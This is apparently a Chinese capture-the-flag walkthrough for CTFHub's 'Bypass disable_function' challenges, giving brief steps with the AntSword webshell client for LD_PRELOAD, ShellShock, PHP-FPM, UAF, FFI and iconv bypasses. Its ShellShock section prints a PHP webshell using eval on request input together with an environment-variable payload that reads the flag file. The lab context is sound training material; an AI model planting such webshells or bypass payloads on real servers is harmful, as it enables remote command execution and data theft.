ctfhub Bypass disable_function(完结)

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

Json Serializer UAF

页面

蚁剑连接

使用工具

执行命令

Backtrace UAF

访问页面

蚁剑连接,使用工具

执行命令

FFI

使用工具

执行命令

iconv

使用工具

刷新查看文件

修改连接,拼接地址

终端执行命令

iconv Bypass 1

与icon一样的步骤

iconv Bypass 2

与icon一样的步骤

相关推荐
卡比巴拉—林1 小时前
LVS 集群技术实践:NAT 与 DR 模式的配置与对比
运维·服务器·lvs
Gappsong8742 小时前
网络安全的重要性
运维·计算机网络·安全·web安全·网络安全·安全威胁分析
CV资深专家5 小时前
Android14 SystemUI 启动流程(2)
android
怀君6 小时前
Flutter——Android原生View是如何通过Flutter进行加载
android·flutter
Kiri霧7 小时前
Kotlin方差
android·开发语言·kotlin
青竹易寒8 小时前
Linux命令技术笔记-sed+awk命令详解
linux·运维·服务器
Kiri霧8 小时前
Kotlin泛型约束
android·linux·windows·kotlin
Kiri霧8 小时前
Kotlin内联函数
android·开发语言·微信·kotlin
liosen8 小时前
【安卓笔记】RxJava的Hook机制,整体拦截器
android·rxjava·hook
Gracker8 小时前
Android Weekly #202518
android